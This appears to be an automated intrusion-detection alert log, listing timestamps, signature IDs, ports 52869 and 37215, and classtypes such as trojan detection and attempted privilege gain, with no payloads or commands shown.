                      Timestamp:07/20/24-23:01:08.600114
                      SID:2831300
                      Source Port:44382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.900987
                      SID:2027339
                      Source Port:46180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.177524
                      SID:2025132
                      Source Port:32964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2829579
                      Source Port:34972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.325773
                      SID:2027339
                      Source Port:43672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.787983
                      SID:2027339
                      Source Port:47580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634292
                      SID:2835222
                      Source Port:51646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.175702
                      SID:2027339
                      Source Port:57266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2829579
                      Source Port:50504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.044669
                      SID:2027339
                      Source Port:39594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.075937
                      SID:2829579
                      Source Port:47294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.110861
                      SID:2835222
                      Source Port:44180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2835222
                      Source Port:50398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2829579
                      Source Port:59616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.269588
                      SID:2831300
                      Source Port:54980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.552279
                      SID:2025132
                      Source Port:48718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.845732
                      SID:2831300
                      Source Port:36454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.083467
                      SID:2835222
                      Source Port:60660
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.719940
                      SID:2027339
                      Source Port:50692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.028316
                      SID:2027339
                      Source Port:34818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.697846
                      SID:2831300
                      Source Port:58184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.773722
                      SID:2027339
                      Source Port:36020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.313163
                      SID:2027339
                      Source Port:39906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.104536
                      SID:2025132
                      Source Port:34962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2829579
                      Source Port:55470
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.466150
                      SID:2025132
                      Source Port:54924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2829579
                      Source Port:57860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.325694
                      SID:2027339
                      Source Port:37036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.099838
                      SID:2831300
                      Source Port:41820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.847364
                      SID:2831300
                      Source Port:42466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.995636
                      SID:2831300
                      Source Port:52914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221220
                      SID:2835222
                      Source Port:47794
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.837053
                      SID:2025132
                      Source Port:42080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2829579
                      Source Port:56186
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.946478
                      SID:2027339
                      Source Port:57058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.061339
                      SID:2025132
                      Source Port:38364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.974742
                      SID:2025132
                      Source Port:47836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.282556
                      SID:2027339
                      Source Port:35706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.756264
                      SID:2831300
                      Source Port:49984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.068251
                      SID:2027339
                      Source Port:49446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.540053
                      SID:2027339
                      Source Port:55358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653028
                      SID:2829579
                      Source Port:49014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.692691
                      SID:2027339
                      Source Port:59040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.194629
                      SID:2027339
                      Source Port:33264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.164161
                      SID:2027339
                      Source Port:45426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221921
                      SID:2829579
                      Source Port:49826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.194629
                      SID:2831300
                      Source Port:33566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.386032
                      SID:2025132
                      Source Port:37672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.415157
                      SID:2025132
                      Source Port:58212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.936545
                      SID:2829579
                      Source Port:56194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2835222
                      Source Port:35718
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.259642
                      SID:2025132
                      Source Port:52638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.175511
                      SID:2027339
                      Source Port:36088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.378871
                      SID:2027339
                      Source Port:58286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.987411
                      SID:2027339
                      Source Port:33048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.415002
                      SID:2025132
                      Source Port:51230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.485617
                      SID:2831300
                      Source Port:55016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.145932
                      SID:2027339
                      Source Port:52068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.359808
                      SID:2027339
                      Source Port:39022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.667964
                      SID:2027339
                      Source Port:36898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.385543
                      SID:2027339
                      Source Port:37590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.932550
                      SID:2027339
                      Source Port:54136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.001716
                      SID:2025132
                      Source Port:39670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.627588
                      SID:2025132
                      Source Port:41408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.567167
                      SID:2027339
                      Source Port:55626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.388031
                      SID:2025132
                      Source Port:60752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.425638
                      SID:2831300
                      Source Port:36282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.652877
                      SID:2027339
                      Source Port:37552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.574948
                      SID:2831300
                      Source Port:38282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.565561
                      SID:2831300
                      Source Port:54690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.722161
                      SID:2025132
                      Source Port:35428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.274940
                      SID:2831300
                      Source Port:58340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2829579
                      Source Port:51714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:45.524183
                      SID:2027339
                      Source Port:41146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.970797
                      SID:2027339
                      Source Port:52042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.638418
                      SID:2829579
                      Source Port:59370
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.810143
                      SID:2025132
                      Source Port:32836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.203130
                      SID:2025132
                      Source Port:59938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.892814
                      SID:2027339
                      Source Port:53108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.716157
                      SID:2025132
                      Source Port:56142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.331592
                      SID:2027339
                      Source Port:56494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.300735
                      SID:2025132
                      Source Port:38046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.114673
                      SID:2835222
                      Source Port:45294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.718643
                      SID:2027339
                      Source Port:58412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.255782
                      SID:2025132
                      Source Port:37054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:48.447183
                      SID:2025132
                      Source Port:51008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:03:46.099099
                      SID:2025132
                      Source Port:39362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.439689
                      SID:2027339
                      Source Port:35164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.686542
                      SID:2027339
                      Source Port:51606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.686830
                      SID:2027339
                      Source Port:45028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650243
                      SID:2829579
                      Source Port:58838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.004906
                      SID:2829579
                      Source Port:46974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2835222
                      Source Port:48170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.819275
                      SID:2027339
                      Source Port:60586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.574571
                      SID:2831300
                      Source Port:36666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.935667
                      SID:2025132
                      Source Port:33366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.487978
                      SID:2025132
                      Source Port:52836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.187360
                      SID:2027339
                      Source Port:38882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222029
                      SID:2829579
                      Source Port:58950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.640160
                      SID:2027339
                      Source Port:56874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.387026
                      SID:2027339
                      Source Port:56040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.400580
                      SID:2831300
                      Source Port:43012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.426681
                      SID:2027339
                      Source Port:37400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.370481
                      SID:2027339
                      Source Port:56636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.798513
                      SID:2027339
                      Source Port:47786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.018425
                      SID:2829579
                      Source Port:41338
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.060799
                      SID:2025132
                      Source Port:60402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.888686
                      SID:2025132
                      Source Port:35966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.528108
                      SID:2025132
                      Source Port:51436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2835222
                      Source Port:46822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.556166
                      SID:2027339
                      Source Port:36780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312614
                      SID:2027339
                      Source Port:43754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.909111
                      SID:2829579
                      Source Port:54320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.098209
                      SID:2835222
                      Source Port:36964
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.687128
                      SID:2027339
                      Source Port:38200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2829579
                      Source Port:41368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2829579
                      Source Port:40920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.612014
                      SID:2025132
                      Source Port:46950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.979245
                      SID:2027339
                      Source Port:33440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.013771
                      SID:2025132
                      Source Port:52668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.069088
                      SID:2831300
                      Source Port:40866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.331820
                      SID:2831300
                      Source Port:36730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.914136
                      SID:2831300
                      Source Port:40474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.595072
                      SID:2027339
                      Source Port:58938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.071126
                      SID:2027339
                      Source Port:44716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.659435
                      SID:2027339
                      Source Port:52074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.213564
                      SID:2829579
                      Source Port:44552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.165780
                      SID:2831300
                      Source Port:51498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.113054
                      SID:2835222
                      Source Port:44984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.852602
                      SID:2831300
                      Source Port:40150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.614619
                      SID:2027339
                      Source Port:50834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.307219
                      SID:2829579
                      Source Port:37866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.046616
                      SID:2829579
                      Source Port:41740
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.607816
                      SID:2831300
                      Source Port:45074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2829579
                      Source Port:37428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.316196
                      SID:2831300
                      Source Port:59750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:20.433035
                      SID:2027339
                      Source Port:54366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.625101
                      SID:2025132
                      Source Port:45762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:20.433034
                      SID:2027339
                      Source Port:36142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.416441
                      SID:2027339
                      Source Port:48310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.410049
                      SID:2027339
                      Source Port:38492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806839
                      SID:2831300
                      Source Port:58376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.979559
                      SID:2027339
                      Source Port:36320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.141970
                      SID:2025132
                      Source Port:48684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2835222
                      Source Port:60438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.284488
                      SID:2829579
                      Source Port:60452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.474391
                      SID:2831300
                      Source Port:54626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.914113
                      SID:2027339
                      Source Port:36066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.612597
                      SID:2831300
                      Source Port:50022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.839991
                      SID:2025132
                      Source Port:49784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.453936
                      SID:2831300
                      Source Port:57814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2835222
                      Source Port:41636
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.296959
                      SID:2025132
                      Source Port:58156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.089365
                      SID:2831300
                      Source Port:56670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.412594
                      SID:2027339
                      Source Port:37478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.158278
                      SID:2829579
                      Source Port:46354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.838946
                      SID:2027339
                      Source Port:47026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807585
                      SID:2831300
                      Source Port:55898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.444461
                      SID:2027339
                      Source Port:58180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.996260
                      SID:2831300
                      Source Port:58652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.413068
                      SID:2027339
                      Source Port:48138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.327808
                      SID:2831300
                      Source Port:52150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2835222
                      Source Port:57576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.684763
                      SID:2027339
                      Source Port:35248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.095767
                      SID:2027339
                      Source Port:35972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.105161
                      SID:2027339
                      Source Port:40212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:34.610209
                      SID:2027339
                      Source Port:53550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.156801
                      SID:2025132
                      Source Port:52004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.429251
                      SID:2027339
                      Source Port:40982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.052371
                      SID:2025132
                      Source Port:40874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.706302
                      SID:2025132
                      Source Port:58266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.660847
                      SID:2025132
                      Source Port:40084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.943244
                      SID:2835222
                      Source Port:42238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.163877
                      SID:2025132
                      Source Port:33238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2829579
                      Source Port:60340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053062
                      SID:2835222
                      Source Port:35306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.301558
                      SID:2027339
                      Source Port:48106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.689806
                      SID:2027339
                      Source Port:41968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.512162
                      SID:2831300
                      Source Port:45772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2835222
                      Source Port:57578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
